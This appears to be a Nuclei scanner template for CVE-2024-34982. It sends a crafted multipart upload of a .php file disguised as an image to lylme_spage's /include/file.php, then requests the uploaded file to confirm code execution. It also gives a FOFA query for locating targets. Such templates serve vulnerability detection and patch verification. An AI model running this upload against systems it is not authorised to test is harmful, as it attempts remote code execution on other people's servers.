id: CVE-2024-34982 info: name: LyLme-Spage - Arbitary File Upload author: DhiyaneshDk severity: high description: | An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file. reference: - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md - https://github.com/tanjiti/sec_profile - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py classification: cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: lylme product: lylme_spage fofa-query: icon_hash="-282504889" tags: cve,cve2024,lylme-spage,rce,intrusive flow: http(1) && http(2) variables: string: "{{randstr}}" filename: "{{to_lower(rand_text_alpha(5))}}" http: - raw: - | POST /include/file.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------575673989461736 -----------------------------575673989461736 Content-Disposition: form-data; name="file"; filename="{{filename}}.php" Content-Type: image/png -----------------------------575673989461736-- matchers-condition: and matchers: - type: word words: - '"code":' - '"msg":' - 'php"}' condition: and - type: status status: - 200 extractors: - type: regex name: path part: body group: 1 regex: - '"url":"([/a-z_0-9.]+)"' internal: true - raw: - | GET {{path}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body, "{{string}}" )' - 'contains(header, "text/html")' condition: and # digest: 4a0a00473045022100d6aa315d5179da098583ea0872b86fe414cbc4cda8301de18ddfafb2a93013ae0220177931a6619243ead54124a71f081a30a8e952360d780e51afa8290a31cff24d:922c64590222798bb761d5b6d8e72950